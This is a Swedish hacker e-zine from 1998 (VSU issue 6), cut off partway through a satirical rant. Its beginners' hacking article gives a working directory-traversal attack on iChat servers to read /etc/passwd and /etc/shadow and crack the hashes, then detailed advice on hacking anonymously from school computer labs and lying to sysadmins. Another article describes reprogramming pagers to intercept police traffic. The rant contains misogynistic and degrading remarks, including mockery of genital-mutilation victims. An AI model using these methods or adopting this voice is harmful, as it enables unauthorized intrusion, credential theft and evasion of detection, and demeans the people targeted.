_ __ ___ | | / /___ _____ / (_)___ _____ _ | | / / __ `/ __ \/ / / __ `/ __ `/ | |/ / /_/ / / / / / / /_/ / /_/ / |___/\__,_/_/ /_/_/_/\__, /\__,_/ /____/ _____ __ _ _ __ / ___// /__(_)_(_) /__________ _____ ___ ____ ___ ____ _ \__ \/ //_/ __ \/ __/ ___/ __ `/ __ `__ \/ __ `__ \/ __ `/ ___/ / ,< / /_/ / /_(__ ) /_/ / / / / / / / / / / / /_/ / /____/_/|_|\____/\__/____/\__,_/_/ /_/ /_/_/ /_/ /_/\__,_/ __ __ __ / / / /___ ____ _____/ /___ ____ ___ ____ ______ / / / / __ \/ __ `/ __ / __ \/ __ `__ \/ __ `/ ___/ / /_/ / / / / /_/ / /_/ / /_/ / / / / / / /_/ / / \____/_/ /_/\__, /\__,_/\____/_/ /_/ /_/\__,_/_/ /____/ VANLIGA SKÖTSAMMA UNGDOMAR NUMMER 6, OKTOBER 1998 Uppmaning -=======- Läs detta zine påtänd, med dina blodsbesudlade händer ivrigt smekande den nyligen stulna Pentium II-datorn!! Officiell epostadress till VSU-redaktionen -========================================- harnhammar@yahoo.com (Skriv till oss om ni har några kommentarer, eller om ni vill prenumerera på vår astuffa mailinglista, så att ni blir den allra första i 'teret som får varje nummer av VSU.) Innehållsförteckning -==================- ( 1) " " ( 2) NYBÖRJARHACKING: HACKA iCHAT-SERVRAR ( 3) VSU - NU ÄVEN PÅ PAPPER ( 4) PERSONSÖKARE ( 5) DAGENS WORD-TIPS ( 6) NYFIKEN PÅ: SVENSKA ZINES, DEL 2 ( 7) TITEL ( 8) NYBÖRJARHACKING: BAKDÖRRAR ( 9) TELIAHACKET (10) Q & A (11) EN AKADEMISK REDOGÖRELSE ÖVER VARFÖR TJUVSAMHÄLLET SUGER KUK (12) ...... (Det var också meningen att vi skulle ha med en artikel vid namn "SLACKERS: VANLIGA SKITSAMMA-UNGDOMAR", men vi orkade aldrig riktigt börja på den. Det var mycket schyssta såpoperor på TV, och Krille-med-kniven hade fått in nya roliga droger och Nintendo-spel, så det blev aldrig av att vi skrev den.) Medverkande skribenter i detta nummer -===================================- Ulf, Motion och Panik Astuff ASCII-logga ovan -=====================- Gjord i CGI-skriptet "Figlet" ------------------------------------------------------------------------------ " " -===- Monique, take the tigers away! Klart grabben ska ha en SCUD-missil! Unge man nu schka ja berätta förej va live' går upå! En av en miljon exakt likadana svenska $ofia-flickor ramlade ner i en flera kilometer djup gatubrunn, och sedan var det bara 999999 exakt likadana svenska $ofia-flickor kvar. Commodore Teenage Riot! Fnord? Kibo. // Ulf of VSU ------------------------------------------------------------------------------ NYBÖRJARHACKING: HACKA iCHAT-SERVRAR -==================================- Här är en text för dig som vill bli en tuff hacker, men som inte kan så mycket än. Den förklarar hur man hackar sig in i system som kör iChat. iChat är ett chatsystem, för alla små 14-åriga mensflickor som chattar på nätet med Jumper och sedan loggar ut och ligger i sina flickrum och tittar på sina Backstreet Boys-planscher och pullar sig själva. iChat är ett populärt chatsystem, och finns installerat lite överallt. iChat innehåller en egen webserver, så man anropar detta chatsystem med sin vanliga webläsare. Många av dessa iChat-system svarar på port 4080, så en typisk adress till ett chatsystem kan se ut så här: http://chat.med.ackliga.mensflickor:4080/en/satans/massa/kataloger/chat.html Alla MIT-nördar (eller vilken jämrans skola de nu gick på) som har kodat iChat var uppenbarligen dåliga på säkerhet, så iChats webserver har en allvarlig bug som vi kan utnyttja för att läsa valfri fil (nästan) på deras system. Ni förstår, alla webservrar har en slags rotkatalog där man hamnar om man bara surfar till http://namn.pa.dator.com/ och inte skriver något filnamn. Det är inte meningen att man ska kunna ta sig upp från denna serverrotkatalog till katalogen ovanför hur som helst, men det kan man på iChats webserver, helt enkelt genom att använda UNIX-systemens vanliga beteckning "..", som just tar dig upp en katalog. Man kan börja med att ta sig uppåt ett par tre kataloger: http://chat.med.ackliga.mensflickor:4080/../../../etc/passwd Om inte det fungerar är det bara att gå upp en katalog till: http://chat.med.ackliga.mensflickor:4080/../../../../etc/passwd När man har nått 6-7 "/../"-hopp och det fortfarande inte fungerar, så kan man bara konstatera att det inte går på den här servern. iChat har nämligen ganska nyligen insett att den här buggen finns, så den är rättad i deras senaste versioner. Men som vanligt finns det ju massor av system där ute på nätet som kör äldre versioner... Med den här metoden kan du läsa vilken fil som helst på en server, som kan läsas av den användare som iChat-webservern körs som. Du kan prova med: /etc/passwd /etc/shadow /etc/services /etc/inetd.conf /etc/motd (/etc/shadow behöver du, om /etc/passwd-filen inte innehåller några krypterade lösenord utan bara har markeringarna "*" eller "x", istället för lösenorden i det andra fältet där lösenorden ska vara. /etc/shadow ska ha sådana filrättigheter att bara root ska kunna läsa den, men å andra sidan är det värt att prova om man kommer åt den, eftersom det säkert finns idioter där ute som kör sin iChat-webserver som root.) Observera att chatsystemet säger åt webläsaren att dessa filer har Content-type: text/html, så radbrytningarna i filerna kommer inte att visas rätt i din webläsare. Det löser du genom att spara filerna från denna läsare som source. I den sparade versionen så kommer då radbrytningarna att vara rätt. När du har fått tag på en fil som innehåller krypterade lösenord, antingen den heter /etc/passwd eller /etc/shadow, laddar du ner lösenordsknäckarprogram och ordlistor från någon 0nd websida. Sedan läser du dokumentationen som följer med lösenordsknäckarprogrammet (RTFM!) och kör programmet i alla tänkbara lägen mot din lösenordsfil och dina ordlistor. Då bör du åtminstone få lösenord till någon användare på iChat-servern. Om du har tur så finns det något annat roligt på samma dator, och inte bara en chat. UNIX-datorer är inte så billiga, så de flesta företag brukar låta samma dator vara webserver, mailserver och en massa annat (iChat-server?) samtidigt. Sedan kan du hacka! Vi har redan varit inne på detta i VSU#4, men vi kan ju ännu en gång påpeka att det är farligt att hacka hemifrån. Du kan bli spårad. Det är bättre att leta reda på något ställe som har en massa nätuppkopplade datorer, och där ingen verkar ha någon koll på vem som ska vara där och som får använda dem. Det brukar gå att hitta sådana ställen på olika lokala skolor. Om någon sysadmin på någon site som du har hackat upptäcker dig kan de ju bara spåra de 0nda IP-paketen till detta ställe där du har suttit, och då är det bara att sluta gå dit och leta reda på något nytt ställe att hacka från. Här är några till saker att tänka på: * Se till att du inte har någon koppling till stället i fråga. Det är dumt om det finns folk på stället som känner igen dig, och vet att det där är Pelle. Det är viktigt att du är anonym. * Ta inte med något som kan identifiera dig, typ ID-kort, bankomatkort eller bibliotekskort. Om du åker fast och har på dig ditt ID-kort är det ju kört direkt, men om du inte har det får du kanske chans att smita från sysadminen senare. (Om ni inte hade fattat denna punkt själva förtjänar ni nästan att bli bustade..) * Anpassa dig så att du passar in i miljön där du ska vara. Om du vanligen klär dig som en punkare och skolan du ska hacka från ligger på Östermalm kan det vara en bra idé att anpassa ditt utseende efter hur folk ser ut på Östermalm, så att du inte sticker ut för mycket. * Välj inte något ställe att hacka från som har mycket med datorer att göra. Det finns en risk att någon anställd har verklig koll på vad de gör, och börjar logga. Gör alltså inte som SHA gjorde: hacka inte från KTH! Det är farligt. Välj något ställe som fick Internet 1996 när mediahypen hade kommit igång på allvar, men där utbildningen inte huvudsakligen handlar om teknik. * Se till att kolla olika lagliga grejer på nätet (din mail, olika websidor o s v) på din egen dator innan du åker till stället du ska hacka från. Annars finns det en risk att du förr eller senare börjar slappna av ("det är ju ingen som loggar på det här stället, de har ju ingen som helst koll") och börjar läsa din email från datorerna på stället du ska hacka från - och det är också farligt. * Ha alltid koll på omgivningen omkring dig. Var alltid medveten om hur man snabbt loggar ut och avslutar det program som du är inne i. Placera alltid muspekaren vid den ruta som avslutar programmet du är i, så att man snabbt kan klicka på den rutan. Det du gör är OLAGLIGT, så om det kommer in någon uppretad 50-åring i datorsalen och säger "Jaha, vad gör ni här då?" vill du snabbt kunna avsluta allting, så att du iallafall inte har några vittnen som kan intyga att du satt på dator X och telnettade till dator Y. * Om du vill vara riktigt ambitiös kan du kolla upp olika klasskataloger och liknande, så att du har något svar på frågan "Vad går du på för kurs då?". Ett OK svar kan vara "Jag går på reklamlinjen" (man hoppas att inte personen man pratar med gör det, för då får man problem). Sedan fortsätter man att titta på datorskärmen. Om de pratar mer får man ursäkta sig: "Du, den här grejen måste vara klar i kväll, så jag har inte tid att prata". Folk kommer inte att tro att en 0nd hacker har tagit sig in i just deras skola, så bara du kommer med trovärdiga svar på eventuella frågor borde du klara dig undan människor i samma datorsal. * Hacka aldrig från datorsalar med mycket folk i. Sätt dig på någon dator en bit från närmaste använda dator, så att ingen sitter bredvid dig och ser vad du gör. Ha koll på hur folk rör sig i rummet, så att du kan logga ut om någon kommer i närheten. * Kom ihåg att det inte är olagligt att logga in med Telnet eller FTP på avlägsna servrar. Det som är olagligt är att logga in med sådana program på servrar där man inte har rätt att vara. Om någon usel sysadmin haffar dig, neka därför alltid till att du har gjort något olagligt. Det där universitetet i Australien har du ett konto på för att du pluggade där förut som utbytesstudent, och det där amerikanska datorföretaget har du också ett konto på, eftersom du har lärt känna en kille som jobbar där via IRC o s v. * Det skadar aldrig att vara litet paranoid. Oavsett hur många Wingate- maskiner som du använder för att koppla dig vidare så kan du ju aldrig veta om inte någon som är ansvarig för den första maskinen i kedjan har upptäckt dig och har ställt in att alla uppkopplingar ska loggas på deras skrivare. // Ulf of VSU ------------------------------------------------------------------------------ VSU - NU ÄVEN PÅ PAPPER -=====================- VSU är inte bara ett e-zine. Vi är numera också ett fanzine. Vi VET vad våra läsare behöver. Jomen, vi är extremt stolta att kunna bringa er VSU#5.5 - det första numret av VSU på papper!! Detta nummer är en samling (en slags "greatest flops" eller "the worst of" eller vad ni vill) som innehåller texter från e-zinet VSU, nummer 1-4. Ur innehållet: * YYYL! * SAGAN 0M DEN ST0RE STYGGE HACKERVARGEN 0CH DE TRE SMÅ SYSADMiNGRiSARNA * 0NDSKANS DUALiSM * RAVEK0MMAND0T TALAR UT! * K0MPETENTA SVENSKA J0URNALiSTER TAR UPP ViKTiGA, ANGELÄGNA FRÅG0R * SAGAN 0M PHERDiNAND .. och mycket mer. Dessutom innehåller fanzinet några bonusspår i form av några av mina (Ulf of VSU:s) texter för e-zinet 020-795611-Knulla-Döden. Som ni kanske vet så var jag med och skrev för 020:s första tre nummer, och några av de texterna finns också med i det här pappersfanzinet. Alla dessa texter finns nu utgivna med BILDER för allra första gången i världshistorien!!! Som om inte allt detta var nog har VSU#5.5 också en brutalt 0nd datarelaterad omslagsbild. Jag säger inte vad det är, men den är så 0nd att hälften vore nog. Om du bor i Sverige kostar varje nummer av VSU#5.5 20 kronor. Om du vill köpa fanzinet, hör av dig via epost till harnhammar@yahoo.com , så skickar vi mer information om hur du gör din beställning. Jag vet att vi har några läsare utanför landets gränser, och om några av dem vill köpa fanzinet kan de också höra av sig via epost, så kan vi räkna ut ett pris för att skicka fanzinet till det land som de bor i. Varje ny beställning kommer att få oss att trycka upp nya nummer av VSU#5.5 med vår sofistikerade print-on-demand-teknik (som går ut på att vi tar med en viktig diskett, och åker via den uschla tunnelbanan med det buggade signalsystemet till ett ställe där vi kan skriva ut gratis). HAHA! Hittills har våra uschla texter bara drabbat nätanvändarna, men nu kommer inte ens de icke uppkopplade människorna att slippa oss. Beställ gärna ett extra nummer av VSU#5.5 till din djupt religiösa gammelfarmor. Hon kommer säkert att älska VSU ;) // Ulf of VSU ------------------------------------------------------------------------------ PERSONSÖKARE -==========- I stort sett alla personsökare som säljs idag är av typen "POCSAG". Detta står för "Post Office Code Standardization Group". Denna standard skapades tidigt av brittiska BT. POCSAG, såsom det är definierat i standarden är 512, 1200 eller 2400 bps (bitar per sekund) FSK-signalering, med en våglängd på +- 4.5 kHz. Datan är NRZ-kodad, där den högre frekvensen representerar 0 och den lägre representerar 1. POCSAG-signalformatet består av en "inledningssignal", och en eller fler batchar. Inledningssignalen består av 576 bitar omväxlande 101010-mönster, sänt i 512, 1200 eller 2400 bps. Personsökaren använder inledningssignalen till att både avgöra om det mottagna är en POCSAG-signal och för synkronisering med dataströmmen. En batch består av en frame synkroniseringskod, följt av 8 frames. Varje frame innehåller två kodord, separerade av ett synkroniseringskodord. Ett meddelande kan ha så många kodord som behövs för att lämna meddelandet, och kan sträcka sig genom många batchar, om det behövs. Slutet på ett meddelande indikeras med ett "nästa adress"-kodord. Både adressering och användardata skickas i kodorden. Skillnaden visas genom den sista siffran i kodorden (LSD) : 0 för adressdata, och 1 för användardata. Standardalfanumeriska data skickas i ett sjubitars format, där varje kodord innehåller 2 6/7 bokstäver. I USA används av vissa telebolag ett system med 8 bitar alfanumerisk data, som tillåter användaren att skicka data som t ex datorfiler och grafik, för att inte glömma vanliga meddelanden. 8 bitars systemet möjliggör 2.5 bokstäver per kodord. Numeriska data är på 4 bitar, och tillåter upp till 5 siffror att överföras per kodord. Tonmeddelanden innehåller endast adressinformation. *** Mottagardelen (Personsökaren) Personsökare finns i hundratals former och storlekar, men de flesta är dock tillverkade av Motorola. Numeriska personsökare står för lite mer än 60% av marknaden, och resten upptas naturligtvis av alfanumeriska personsökare. De adresseras unikt, med en sex till åtta siffror lång s k "capcode". Denna är ofta skriven på personsökarenheten. Numeriska personsökare har trots sin svaghet i och med att de bara kan visa siffror bevisat motsatsen. Många sökningar är naturligtvis relaterade till telefonnummer, men folk har även byggt upp ett kodsystem där varje siffer- kombination står för något speciellt. Jag skulle gissa att Kina är det mest aktiva landet i världen när det gäller numeriska sökningar, tätt följda av alla knarklangare. (2112 0830 187 - Var på mötesplatsen halv nio, annars skjuter jag dig i huvudet.) Alfanumeriska personsökare är för det mesta kontaktade via en speciell service där man manuellt får slå in eller säga meddelandet som skall skickas. Personsökare kan även ha samma capcode som de adresseras via, t ex polisen i många större städer använder sig av personsökare. Alltså kan flera personsökare ha samma capkod, och sålunda torde det ej vara särskilt svårt att t ex ändra capkoden i sin egen personsökare till den capkod som man är intresserad av att sniffa trafiken på. De flesta personsökare har sin capkod lagrad i en PAL-krets, vilken torde vara en smal sak att ändra capkod i, om man vill det. Så hemskt svårt behöver man dock ej göra det för sig, då det finns ritningar och programvara till att programmera om personsökare av de flesta tillverkare lätt tillgängligt på Internet. Det som behövs är för det mesta en speciell seriekabel samt programvara. Är ni intresserade av detta kan jag hänvisa till http://radiophone.dhp.com/ där mängder av information om både analog samt digital radiokommunikation finns att inhämta. I andra länder än Sverige, USA t ex, finns personsökare som kan programmeras "över luften" av företaget som tillhandahåller tjänsten i fråga. Denna teknik kallas OTP (Over The air Programming). De möjligheter som finns vid OTP- programmering brukar inskränkas till att lägga till / ta bort capkoder eller låsa personsökaren om de ligger efter med räkning. *** Tjänster I Sverige har marknaden slutat att köpa personsökare, till förmån för mobiltelefoner, främst då GSM. Men i andra länder är utbudet av olika tjänster som kan knytas till personsökaren stort. Email är nog bland det trevligaste man kan få skickat till sin personsökare (om man inte är med på en miljon mailinglistor). Amerikanska företag som t ex SkyTel och Radiomail tillhandahåller denna tjänst, och ger kunden en email- adress som brukar se ut som följande: nummer@skymail.com. Detta behöver man dock EJ betala för - det finns ett flertal olika helt gratis personsökar- gateways på Internet, och diverse olika shellscripts som använder sig av detta och via email forwarding från en UNIX-maskin kan skicka din personsökare t ex subjekt- och från-raden på ett email. Ett sådant program är IXOBEEPER som bör kunna hittas lätt med en archie-förfrågan. Det finns även två RFC-filer om personsökare och Internet: 1568 samt 1569. Förstnämnda, 1568 behandlar SNPP, Simple Network Paging Protocol, vilket har mycket stora likheter med SMTP (Simple Mail Transfer Protocol), d v s kommandon i stil med: PAGE - Följt av personsökarnumret. MESS - Följt av det numeriska / alfanumeriska meddelandet. SEND - Skicka. & QUIT - Avsluta sändning och logga ur. Den andra RFC-filen, 1569, behandlar adressering av alla personsökare under en speciell domän, TPC.INT, vilken då skulle vara reserverad för tjänster med direkt anslutning till telefonbolag. Användarnamn skulle då vara begränsade till personsökarnumret, och en sökning på t ex amerikanska 1-800-555-1212 skulle sändas som "pager@2.1.2.1.5.5.5.0.0.8.1.tcp.int." Dock bör nämnas att ingen av dessa RFC-filer har legat till grund för någon standard hur detta skall hanteras över Internet. Fortfarande är det "hemskrivna" program som hanterar så kallade "pager gateways", fritt översatt "personsökarportar". *** Personsökarfrekvenser och nättyper Österrike 162.050 - 162.075 T,N,A Australien 148.100 - 166.540 T,N,A 411.500 - 511.500 T,N,A Kanada 929.025 - 931-975 T,N,A 138.025 - 173.975 T,N,A 406.025 - 511.975 T,N,A Kina 152.000 - 172.575 N,A Danmark 469.750 N,A Finland 450.225 T,N,A 146.275 - 146.325 T,N,A Frankrike 466.025 - 466.075 T,N,A Tyskland 465.970 - 466.075 T,N,A 173.200 T,N,A Hong Kong 172.525 N,A 280.0875 T,N,A Indonesien 151.175 - 153.050 A Irland 153.000 - 153.825 T,N,A Italien 466.075 T,N,A 161.175 T,N Japan 278.1625 - 283.8875 T,N Korea 146.320 - 173.320 T,N,A Malaysia 152.175 - 172.525 N,A,V 931.9375 N,A Holland 156.9865 - 164.350 T,N,A Nya Zealand 157.925 - 158.050 T,N,A Norge 148.050 - 169.850 T,N,A Singapore 161.450 N,A 931.9375 N,A Sverige 169.8 T,N,A Schweiz 149.5 T,N,A Taiwan 166.775 N,A 280.9375 N,A Thailand 450.525 N,A 172.525 - 173.475 N,A England 138.150 - 153.275 T,N,A 454.675 - 466.075 T,N,A *** Teckenförklaring till tabellen T = Ton N = Nummer A = Alfanumerisk V = Röst --------------------------------------- motion@webservices.se http://c5.hakker.com/ PGP key? finger motion@geek.rcc.se --------------------------------------- // Motion ------------------------------------------------------------------------------ DAGENS WORD-TIPS -==============- Släng ut skiten, och installera EMACS eller Micro EMACS istället. // Ulf of VSU ------------------------------------------------------------------------------ NYFIKEN PÅ: SVENSKA ZINES, DEL 2 -==============================- I vårt förra nummer (VSU#5) hade vi med en kort beskrivning av vad zines är, samt en genomgång av den svenska zinesscenen. Under den tid som har flutit förbi sedan dess har några nya zines startat, och det har kommit ut nya nummer av de zines som vi skrev om då. Vi hälsar "Vanliga Svenska Priikers", "K.L.0.R.B's Frikar Läcktyr", "Mr. Headache's Underground" och "Liberalt Oorganiserat Drägg" välkomna till listan. Dessutom har vi med ny information om "Just Another Zine", "Klan of the BloodStained Blade" och "Underground eXperts United", som vi skrev om i förra numret. Här följer en uppdatering av vår svenska zineslista från VSU#5: * JUST ANOTHER ZINE (JAZ) Inriktning: Ironisk humor Antal utgivna nummer: 3 Status: Levande Ladda ner från: http://hem2.passagen.se/k3wl/ * K.L.0.R.B'S FRIKAR LÄCKTYR Inriktning: Tekniska artiklar och allmän 0ndska Antal utgivna nummer: 1 Status: ??? Officiell websida: http://members.xoom.com/kl0rb/ * KLAN OF THE BLOODSTAINED BLADE (KBB) Inriktning: Tekniska artiklar, med mycket information om phone phreaking och tillverkning av bomber Antal utgivna nummer: 15 Status: Död Officiell websida: http://www.smite.org/kbb/ * LIBERALT OORGANISERAT DRÄGG (LOD) Inriktning: Allmän 0ndska plus lite phone phreaking Antal utgivna nummer: 2 Status: Levande Kontaktadress: liberalt_oorganiserat_dragg@usa.net * MR. HEADACHE'S UNDERGROUND Inriktning: Allmän undergroundinriktning, med tips på hur man kan hämnas på sina fiender och liknande. De har mycket material som är klippt från olika publikationer, men de anger alltid källan. Antal utgivna nummer: 5 Status: Levande Officiell websida: http://www.geocities.com/Baja/1156/ * UNDERGROUND EXPERTS UNITED (uXu) Inriktning: uXu har funnits sedan 1991, och har gett ut massvis med texter. De har breddat sig, och på gott och ont känns de inte lika tydligt underground som sina zineskollegor (trots namnet!). En del av deras material skulle kunna vara med i någon uppkäftig liten kulturtidskrift, typ "Äcklet". Språk: Engelska i huvudsak, men ger även ut en del material på svenska Antal utgivna nummer: 31 Status: Levande Officiell websida: http://www.uxu.org/ * VANLIGA SVENSKA PRIIKERS (VSP) [a] Inriktning: Tekniska artiklar om phone phreaking, med speciell inriktning på beige boxing Antal utgivna nummer: 4 Status: Levande Officiell websida: http://members.xoom.com/Priik/ KOMMENTARER: [a] ..hmm, jag undrar just var de fick inspirationen till det namnvalet från ;).. Förutom zinet innehåller VSP:s websida bl a phreakingrelaterade foton och program. Numera finns det alltså totalt 14 svenska zines med på vår astuffa lista!! Wow, 14 stycken! Det börjar ju verkligen att likna något, speciellt med tanke på vad få av dessa som fanns bara för några år sedan. Skicka gärna era zines till oss VSU:are på vår officiella epostadress harnhammar@yahoo.com , så slipper vi leta upp dem själva på diverse skumma websidor. Skriv till samma adress om vi har publicerat felaktig information (status, antal utgivna nummer eller dylikt) för något av dessa zines, i våra listor i VSU#5 eller VSU#6. Fler delar av den här listan kommer att komma ut. "Vi brinner för det här permanent", som det rappas i visan. Ni kan också skriva till oss om ni har publicerat någon typ av hack/phreak/ kemi/virusinformation på något annat sätt än genom ett zine. Ni kanske har en h/p-grupp som ger ut textfiler eller exploits. I så fall vill vi att ni skickar adresser (www, ftp) där man kan ladda ner allt som ni har släppt, så kan vi skriva om det i något kommande nummer. Vi vet att det finns folk som har släppt sådan information här i Sverige - exempelvis brukade Swedish Infomania släppa textfiler om kemi och bombtillverkning förut, och det finns också en hackingrelaterad serie av textfiler som heter "My Word", men det finns säkert en massa annat sådant material som vi har missat. // Ulf of VSU ------------------------------------------------------------------------------ TITEL -===- [Scenanvisning. Ett rum med inredning, men med en allvarlig brist på folk. En efter en kommer tre personer in i rummet.] Röst 1: - Han heter Ulf, och han är medelklass, så han måste föras till villaområdet med detsamma! Röst 2: - Ööööhh, villaområdet, har'u fått spader? Där blir han medelklass ju! Röst 3: - Ååh nej nej! Ginsberg, jag vill stanna här hos dig!! Välkommen till ett 24 timmars survival game, som är sponsrat av Snickers. Detta survival game är dels till för att ni ska köpa vår uschla choklad, och dels till för att ni ska slippa tänka på det 90 års survival game som ni redan spelar. Klättermus, karriärist, det kan gå på ett ut. Ska det vara 0nt, ska det vara VSU! Välkommen till den amerikanska drömmen i villorna i Ljungby och Lotorp, där de välansade moderatmänniskorna suger av Ronald McDonald varje dag och kommer hem och har sex till CD-skivan "Smurfhits vol. 18: Sånger att älska till" och där de inte tvekar en sekund att tacka ja till diverse skamliga förslag från Eric$$on. Familjelivet är för hjärnan vad rullat0rn är för kroppen: en krycka att ta till, när man har tagit skada av sitt åldrande, så att man inte längre klarar av saker på riktigt. Man kommer osökt att tänka på vissa insekter vars nervsystem är uppbyggt så att kroppen klarar av att fortsätta röra sig en stund, fast de har blivit halshuggna. If (NyttJobb.Lön > GammaltJobb.Lön) then BytJobbDirekt(NyttJobb); Se de härligt obildade skitungarna från villaområdena i Lotorp, som just har slösat bort 15 år av sina liv på att dra i en joystick! Flockmänniskorna! Slavmänniskorna! De MYCKET FÖR MÅNGA! Allt i mainstreamsamhället suger alltid, inklusive rättsväsendet. Borta i USA har Kevin Mitnick varit häktad i över tre år utan att ha fått någon rättegång. Skåda lämmeltåget av hundratusentals exakt likadana indieflickor, som går och köper samma Radiohead-CD exakt samma dag, för att media har sagt åt dem att köpa den. Man är ett offer för massmedia. Det finns många bättre band i samma genre, men de ligger inte på lika stora skivbolag, så för att upptäcka deras musik måste man anstränga sig lite själv, vilket inte så många människor orkar. Var egentligen det klonade fåret Dolly något nytt? Folk verkar ju vara bra själva på att bli exakta kopior av varandra, så vi behöver inte kunna klona. Du är lurad. All popmusik och all annan populärkultur är bara en marknads- föringsploj för att få sälja mer kläder och fler stereoanläggningar. Maskiner är vi allihopa. Skillnaden mellan Metal Maniac och lysröret ovanför Metal Maniac är jävligt liten. Välkommen till den förljugna akademiska världen, där alla har fastnat i leken "Följa Professorn" (en lek för vuxna, som har exakt samma regler som en lek för barn som heter "Följa John"). De tror att de är fria att komma med helt nya teorier, men egentligen är de lika fastlåsta av trender och tidsandan som vilken klädaffär som helst. Om det nu är så viktigt att hålla folk i allmänhet och arbetarklassen i synnerhet utanför era högstående jävla diskussioner kan ni väl gå tillbaks till att prata latin? Det har ju nyttjats förr i tiden för att undanhålla information, och då gick det över all förväntan. Det vi talar om här är människor vars hela inre kan liknas vid någon jämrans databassök- ning. Man tänker aldrig själv, utan letar reda på vad kända akademiker har sagt och lär sig sedan detta utantill. Dessutom är ju läraryrket dömt att dö ut, eftersom vi har uppfunnit både bandspelare och video för länge sedan. En lärare är ju samma sak som en bandspelare - en grej som mekaniskt läser upp ett förprogrammerat meddelande utan några som helst variationer. Systembolagskatalogens beskrivningar är inte anpassade till verkligheten. Ett allvarligt glapp har uppstått mellan teori och praktik. Beskrivningarna i katalogeländet ser ut så här: "Ett fruktigt vitt vin med aningen besk efter- smak". Detta är dåligt anpassat till normalsvenskens alkoholvanor. Om de skulle tänka mer på sina kunder skulle deras beskrivningar i katalogen snarare se ut så här: "ööh faan du blir full jehvla snabt på den hära flarran grabben men de kåmmerå smaka skit i munnjeveln efterettag såru kanschke kåmmerå b-höva spy fan". (Vanliga Skämtsamma Ungdomar!?) Ack! Ni tvetrogna, som ständigt och skändligen förgäves söker efter dolda budskap och meningar i allt. I sanning förtälja jag eder: litteraturen äro ett konsthantverk! Bra litteratur uppstå, då författaren placera ut mellanslagen mellan orden i vackra mönster. Allt annat (bokstäverna i sig, de eventuella ord som bokstäverna bildar) är oviktigt - endast mönstret som mellanslagen bilda i texten äro af betydelse. Vänskap är som ett cat-kommando (eller TYPE om vi talar om sådana där äckliga kommersiella operativsystem från Malmskillnadsgatan). Man har vänner för att kunna kopiera deras kunskap och den information som de har samlat på sig. En vän är alltså samma sak som en journalist, eftersom journalisterna också finns för att förmedla information till dig. Sannerligen, det hårt kriminellt belastade Brödraskapet VSU har skådat världens sanna värden! Jag ger dig endast två alternativ: konstnär eller maskin! Brottsling eller oväsentlig villaägare! Bryt mot lagen, eller bli bortglömd! Nörden är uppfinningens moder! "I've got nothing to say, but it's OK. Good morning. Good morning. Good morning." (Lennon/McCartney) Vi står för det förvirrade och upprörande, de åsikter som ni silar bort i er lismande självgodhet. Välkommen till det redan urspårade informationssamhället, där Passagen och Torget ivrigt tävlar om att slå nya bottenrekord i uselt förenklande kvälls- tidningsjournalistik, där all text är färdigvinklad och där "journalisten" redan har tagit ställning åt dig, så att du slipper tänka. Allt kommer att bli så mycket bättre om alla fåniga jävla företag och alla fåniga jävla myndig- heter och klubbar och organisationer har fula websidor på World Wide Fucking- web med limegröna logos och animerade GIF:far SOM SUGER! Låt oss alla gå ner på knä och tillbe vår Gud, Guldkalven WWW! Våga aldrig öppna TCP/IP- uppkopplingar mot någon annan port än nummer 80 - det kan vara farligt! Vi ska nå fram till en ny värld, och vi ska ta ett symboliskt steg för mänskligheten genom att byta ut den gamla DALAHÄSTEN mot en skinande ny DATAHÄST!!! Du kan vinna ett fjälltält och en verktygslåda, om du lyckas bevisa för KK-stiftelsen att du är den globala byns största byfåne - THE village idiot of the global village. Låtar slutar. "Det här var Seg Dion med en dålig låt, och du lyssnar på Radio Mix Megapol Power Lugna Favoriter 10x,x. Jag heter Anders Trist, och det spelar ingen som helst roll vad jag säger så länge jag har kvar det här onaturligt hurtiga tonfallet, eftersom både jag och alla mina lyssnare är helt döda inuti. Medeltemperaturen i Sverige idag är 9,3 grader - kallt, eller hur? Nu är det dags för lite reklam, men häng kvar: den här timmen ska vi spela Phil Collins, Dr Bombay och Michael Bolton!!!!" Tänk på avståndet mellan plattformen och tunnelbanetåget, så att du helgar det. Mind the gap! (Och då talar jag alltså inte om klädaffärskedjan The Gap.) Samhället har lyckats samla ihop allt Eric$$onskräp och allt Teliaskräp på samma ställe, men vi har inte lyckats ta död på dem än, vilket är synd. (Det var väl därför vi skulle samla ihop de allra falskaste i de där fula husen, för att kunna ha ihjäl dem lättare?) Det är inte lika tragiskt när första klassvagnarna på tåg råkar ut för olyckor, som det är när det händer något med andra klassvagnarna. Jag menar, för att få råd att åka första klass måste man ju ha sålt sig, så de människorna förtjänar ju en och annan trafikolycka. Anna Book kommer ut ur kulissen helt orepeterat, för att påbörja sin nya karriär som politisk singer/songwriter: "P-K-K, du är i mina tankar, K-G-B, mitt hjärta det bankar, R-A-F, du får mig alltför lätt ur balans". Skalman bär snabbt ut henne, och påbörjar en meningslös akademisk monolog om huruvida man löses upp direkt om man dyker med huvudet före ner i en simbas- säng full med frätande syra eller om man hinner känna att det gör ont först. Politiska åsikter är som strumpor: ibland kan man ha blåa, ibland röda eller gröna. Det är inte så noga. Det viktiga är att man byter ofta - annars börjar de att lukta. Äntligen kan det avslöjas: spermafläckarna på Monica Lewinskys klänning kom inte alls från Bill Clinton!! Frk Lewinsky är inte bara politikergroupie, hon är även hackergroupie! Fläckarna kom faktiskt från ett tillfälle när hon var totalt omåttlig, och sög av diverse VSU-profiler + samtliga Phrack-redaktörer någonsin + stora delar av 2600-redaktionen + ett antal pensionerade SHA- medlemmar som fick ett hackeråterfall för att slippa undan villaområdets gråa tristess. (Varför fick man inte se någon bild på den där nedfläckade klän- ningen i media förresten? Normalt sett brukar de ju jobba hårt på att hitta bildmaterial, som illustrerar texterna de skriver.) "Den unge mannen var så ironisk, att jag blev tvungen att gripa honom." (replik ur operan Tosca) Ironin får aldrig ta slut. Knesset och Seinfeld är våra upplysta förebilder, som har lärt oss att vara totalt BETYDELSEBLINDA och prata lika länge och lika allvarligt om hål i strumpor som om atombomber. Ironisk religion är en bra idé: "Ja, jag tror verkligen JÄTTEMYCKET på Gud, PRECIS hela tiden!" Ironisk kärlek också: "Ja, jag ÄLSKAR DIG JÄTTEMYCKET! Det är ju inte alls så att jag bara håller dig i handen för att få knulla senare, och det är ju inte alls så att du bara har tagit första bästa ingenjör för pengarnas skull." (Det är ingen tillfällighet att de svenska orden "fästman" och "fästmassa" börjar med exakt samma bokstäver.) Vi letar ständigt efter nya kickar för att bota tristessen. I fortsättningen ska vi bara ha sex med omskurna afrikanska kvinnor. (Vadå "det gör fruktans- värt ont för dem"? Det är väl ändå inte VÅRT JÄVLA PROBLEM!) Det som gällde 1997 gäller sällan 1998. "Heroin is so passe", som det står i 